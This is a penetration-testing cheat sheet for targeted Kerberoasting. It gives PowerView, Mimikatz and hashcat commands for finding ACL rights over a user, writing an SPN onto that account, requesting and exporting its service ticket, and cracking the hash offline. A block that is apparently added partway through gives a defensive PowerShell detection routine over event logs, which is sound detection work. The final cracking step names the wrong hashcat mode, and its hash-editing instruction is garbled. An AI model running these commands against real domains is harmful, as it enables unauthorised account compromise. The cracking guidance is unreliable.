# Set SPN

### **Enumerate permissions for the group on ACL**

{% code overflow="wrap" %}

```
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
```

{% endcode %}

### **Check if the user has SPN**

```
. ./Powerview_dev.ps1
Get-DomainUser -Identity <username> | select samaccountname, serviceprincipalname
```

or

```
Get-NetUser | Where-Object {$_.servicePrincipalName}
```

### **Set SPN for the user**

```
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='ops/whatever1'}
```

### **Request a TGS**

{% code overflow="wrap" %}

```
Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"
```

{% endcode %}
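The SPN write and the ticket request above each leave a record in the domain controller Security log: event 5136 for the `servicePrincipalName` change (when directory service change auditing is enabled) and event 4769 for the service ticket. The following is an added example, not part of the original page, that correlates the two to flag an SPN added to a user object and then used for an RC4 ticket request. The function name, the `-DnToSam` lookup and the sample records are assumptions constructed for illustration.

```powershell
# Added example; field names follow the EventData of Security events 5136 and 4769.
function Find-SpnWriteThenRc4Ticket {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [Parameter(Mandatory)] [hashtable] $DnToSam,   # assumed lookup: object DN -> sAMAccountName
        [timespan] $Window = [timespan]::FromHours(24)
    )
    # 5136: an SPN value was added (%%14674) to an object of class "user".
    $writes = $Events | Where-Object {
        $_.Id -eq 5136 -and $_.ObjectClass -eq 'user' -and
        $_.AttributeLDAPDisplayName -eq 'servicePrincipalName' -and
        $_.OperationType -eq '%%14674'
    }
    # 4769: service ticket issued with RC4-HMAC (0x17), the type that is cracked offline.
    $tickets = $Events | Where-Object { $_.Id -eq 4769 -and $_.TicketEncryptionType -eq '0x17' }

    foreach ($w in $writes) {
        $sam = $DnToSam[$w.ObjectDN]
        if (-not $sam) { continue }                      # unknown object: skip, do not guess
        foreach ($t in $tickets) {
            $delta = $t.TimeCreated - $w.TimeCreated
            if ($t.ServiceName -eq $sam -and $delta -ge [timespan]::Zero -and $delta -le $Window) {
                [pscustomobject]@{
                    Account      = $sam
                    SpnAdded     = $w.AttributeValue
                    WrittenBy    = $w.SubjectUserName
                    RequestedBy  = $t.TargetUserName
                    ClientAddr   = $t.IpAddress
                    MinutesAfter = [math]::Round($delta.TotalMinutes, 1)
                }
            }
        }
    }
}

# Constructed sample records (not real logs); names and addresses are placeholders.
$t0 = Get-Date '2024-01-10T09:00:00'
$sample = @(
    [pscustomobject]@{ Id=5136; TimeCreated=$t0; SubjectUserName='helpdesk1'; ObjectClass='user'
        ObjectDN='CN=Alice Example,CN=Users,DC=corp,DC=example'
        AttributeLDAPDisplayName='servicePrincipalName'; AttributeValue='ops/whatever1'; OperationType='%%14674' }
    [pscustomobject]@{ Id=4769; TimeCreated=$t0.AddMinutes(2); TargetUserName='helpdesk1@CORP.EXAMPLE'
        ServiceName='alice'; TicketEncryptionType='0x17'; IpAddress='::ffff:192.0.2.15' }
    [pscustomobject]@{ Id=4769; TimeCreated=$t0.AddMinutes(5); TargetUserName='bob@CORP.EXAMPLE'
        ServiceName='FILESRV01$'; TicketEncryptionType='0x12'; IpAddress='::ffff:192.0.2.20' }
)
$map = @{ 'CN=Alice Example,CN=Users,DC=corp,DC=example' = 'alice' }
Find-SpnWriteThenRc4Ticket -Events $sample -DnToSam $map | Format-List
```

On live data, build the records from `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=5136,4769}` and fill the lookup with `Get-ADUser`.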

### **Export ticket to disk for offline cracking**

```
Invoke-Mimikatz -Command '"Kerberos::list /export"'
```

### **Request TGS hash for offline cracking with hashcat**

{% code overflow="wrap" %}

```
Get-DomainUser -Identity <username> | Get-DomainSPNTicket | select -ExpandProperty Hash
```

{% endcode %}

### **Crack the hash with hashcat**

Edit the hash by inserting '23' after the kerbrs

```
hashcat -a 0 -m 18200 hash.txt rockyou.txt
```

